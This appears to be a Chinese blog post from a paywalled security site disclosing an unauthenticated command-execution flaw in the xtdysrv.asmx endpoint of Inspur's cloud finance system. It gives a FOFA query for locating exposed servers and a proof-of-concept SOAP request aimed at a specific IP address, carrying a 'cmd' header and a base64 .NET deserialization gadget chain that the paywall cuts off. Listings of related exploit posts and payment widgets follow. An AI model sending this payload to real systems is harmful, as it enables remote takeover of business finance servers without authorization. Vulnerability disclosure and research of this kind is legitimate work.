浪潮云财务系统xtdysrv.asmx存在命令执行漏洞

最新推荐文章于 2025-06-19 17:33:01 发布
原创 最新推荐文章于 2025-06-19 17:33:01 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

一、漏洞简介

浪潮云财务系统xtdysrv.asmx存在命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码。

二、漏洞影响

浪潮云财务系统

三、网络测绘:

fofa:
title="TSCEV4.0"

在这里插入图片描述

四、复现过程

前置条件

步骤 POC 1

数据包

POST /cwbase/service/rps/xtdysrv.asmx HTTP/1.1
Host: 106.38.42.250:8090
Content-Type: text/xml; charset=utf-8
Content-Length: 16398
SOAPAction: "http://tempuri.org/SavePrintFormatAssign"
cmd: whoami

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SavePrintFormatAssign xmlns="http://tempuri.org/">
      <psBizObj>string</psBizObj>
      <psLxId>string</psLxId>
<psLxMc>string</psLxMc>
      <printOpByte>AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAAEAAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwBrydRkAAAAAAAAAADgAAIhCwELAAAIAAAABgAAAAAAAN4mAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACQJgAASwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAAOQGAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACoAgAAAEAAAAAEAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAAA4AAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAw
最低0.47元/天 解锁文章
浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
初岄的博客
07-26 1645
浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
浪潮ClusterEngineV4.0 任意用户登录漏洞
千寻的博客
04-24 1266
文章目录漏洞名称漏洞描述影响版本fofa漏洞复现第一步 登录页面第二步 成功登录后台摘抄 漏洞名称 浪潮ClusterEngineV4.0 存在任意用户登录漏洞漏洞描述 浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限 影响版本 浪潮ClusterEngineV4.0 fofa title="TSCEV4.0" 漏洞复现 第一步 登录页面 第二步 成功登录后台 摘抄 要么,年轻时足够的坦荡; 要么,此刻的忏悔足够虔诚。 – 许嵩
【攻防演练】【含poc】【临时解决方案】浪潮云财务系统存在命令执行
zzxx191z的博客
07-25 1639
径/cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx存在命。【漏洞详情】:近日安全运营中心收到漏洞预警情报,浪潮云财务系统路。【情报简述】:关于浪潮云财务系统存在命令执行。临时措施:封堵该路径,等待厂商发布升级补丁。【漏洞类型】:命令执行
漏洞复现-浪潮-GS企业管理软件-RCE
无问社区的博客
08-28 2362
浪潮GS是浪潮研发的系统软件,浪潮GS,采用SOA 架构和先进开放的GSP 应用中间件开发,面向大中型集团企业提供的一套数据集中、应用集中、管理集中的全面解决方案。浪潮GS企业管理软件存在RCE(Remote Code Execution,远程代码执行)漏洞是指攻击者能够在远程服务器上执行任意代码的安全漏洞。此类漏洞通常会让攻击者完全控制受影响的系统,导致严重的安全问题。
全程云OA系统QCPES.asmx存在SQL注入漏洞
缘梦未来的博客
11-13 263
全程云OA平台为企业提供全面的办公管理解决方案,涵盖了日常办公管理、公文管理、工作请示、汇报、档案管理、知识体系、预算控制等26个核心功能模块,以及100多个子模块,旨在帮助企业实现高效、流畅的内部信息交流与协作。 该平台不仅为企业提供了畅通的信息渠道,还推动了公司信息系统的发展。通过优化工作流程和提升办公自动化程度,全程云OA助力企业提高综合管理水平,加快信息流通,从而有效提升企业的市场竞争力。
科拓全智能停车收费系统 Webservice.asmx 任意文件上传漏洞复现
0xSec
05-17 1211
科拓全智能停车收费系统 Webservice.asmx接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友NC cartabletimeline/doList SQL注入漏洞复现
0xSec
07-29 1808
用友NC /portal/pt/cartabletimeline/doList 接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
Moss本身WebServices明细
03-25 218
Admin Web Service http://<AdminSite>/_vti_adm/Admin.asmx Provides methods for managing a deployment of Microsoft Windows SharePoint Services, such as for creating or deleting site collect...
浪潮远控卡的登录爆破漏洞
weixin_30326515的博客
01-26 1029
一、浪潮远控卡简介 浪潮远控卡是一款插在服务器上的,方便运维人员和服务器管理人员对服务器进行远程控制的WEB服务,其在80端口对外提供HTTP服务。登录进去以后可以对服务器硬件进行远程控制和管理。例如CPU、内存等性能指标监控,远程开启关闭服务器上的虚拟机,甚至作为控制虚拟主机的跳板机。 二、浪潮远控卡的漏洞: 浪潮远控卡可以尝试使用admin/admin进行登录尝试,很有可能可以进...
insuperRCE:浪潮云 ClusterEngineV4.0 前台getshell
04-16
insuperRCE 浪潮云 ClusterEngineV4.0 前台getshell
(CVE-2020-21224)浪潮ClusterEngineV4.0 远程命令执行漏洞复现
ximo的博客
04-14 4118
简介 浪潮 Inspur ClusterEngine是中国浪潮公司的一个应用软件。提供管理集群系统中软硬件提交的作业。 漏洞描述 浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行 影响版本 浪潮ClusterEngineV4.0 FOFA title="TSCEV4.0" 复现过程 FOFA搜索: 登录页面: 输入账号密码,进行抓包: 页面不存在验证码,且存在用户名枚举,进行暴力破解: 通过fuzz,发现在用户名或密码任意一处添加 ’ ,会报错: 正常输入: 添加单引号: 添加分号,
分享云安全浪潮src漏洞挖掘技巧,从零基础到精通,收藏这篇就够了!
Libra1313的博客
04-03 1214
各位靓仔靓女们,大家好!最近沉迷于研究云安全漏洞挖掘,发现了不少骚操作。今天就来和大家分享一下,保证干货满满,都是我实战中挖出来的站点漏洞案例!本文将带你了解云安全的崛起以及未来可能遇到的各种问题。从多个角度,用大白话给大家讲讲云安全的优点、缺点,以及最重要的安全问题。毕竟,云安全最大的特点就是方便,但安全问题绝对不能掉以轻心!接下来,我会分享关于。
浪潮GS企业管理软件GetChildFormAndEntityList存在反序列化漏洞
xiaokp7的博客
07-24 1304
浪潮GS 面向大中型集团企业采用SOA 架构和先进开放的GSP 应用中间件开发,形成了集团管控13 大领域15 大行业60余个细分行业的解决方案。在管理方面,浪潮GS 有效帮助企业有效实现财务集中管理、资金集中管理、资产集中管理、供应链集中管理,从而达到集团信息的集中监控以及企业集团成员之间资源共享、合作共赢、共同发展。在业务方面,浪潮GS 支持供应链协同、生产管理协同,打破企业资源(人、财、物、信息、流程等)之间的各种壁垒和边界,帮助企业实现内外供应链的全面管理,从而提高了整个产业链对客户的反应速度。
漏洞复现】浪潮海岳 HCM Cloud download 任意文件读取漏洞复现
m0_71944965的博客
12-06 351
浪潮海岳HCM-Cloud /download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
gsp_unitdefinewebservice.asmx反序列化POC
最新发布
Zhou-XueLin
06-19 322
【代码】gsp_unitdefinewebservice.asmx反序列化POC。
浪潮海岳 UploadListFile文件上传致RCE漏洞
西米安全
01-16 509
浪潮云财务系统的/cwbase/EP/ListContent/UploadListFile.ashx接口存在任意文件上传漏洞,未经身份验证的攻击者可以通过该漏洞上传恶意脚本文件,从而控制目标服务器。
2024HW漏洞总结500+个漏洞|威胁情报第|HW情报
weixin_43167326的博客
09-02 5051
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
2024年9月新增漏洞汇总|漏洞威胁情报|漏洞订阅
weixin_43167326的博客
09-24 1605
漏洞库有多个软件系统和平台的漏洞类型,其中包括SQL注入、任意文件上传、远程代码执行、信息泄露等。具体漏洞影响的系统范围广泛,涵盖了财务管理系统、CMS(内容管理系统)、ERP系统、VPN设备、路由器等各类常见企业和网络管理平台。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值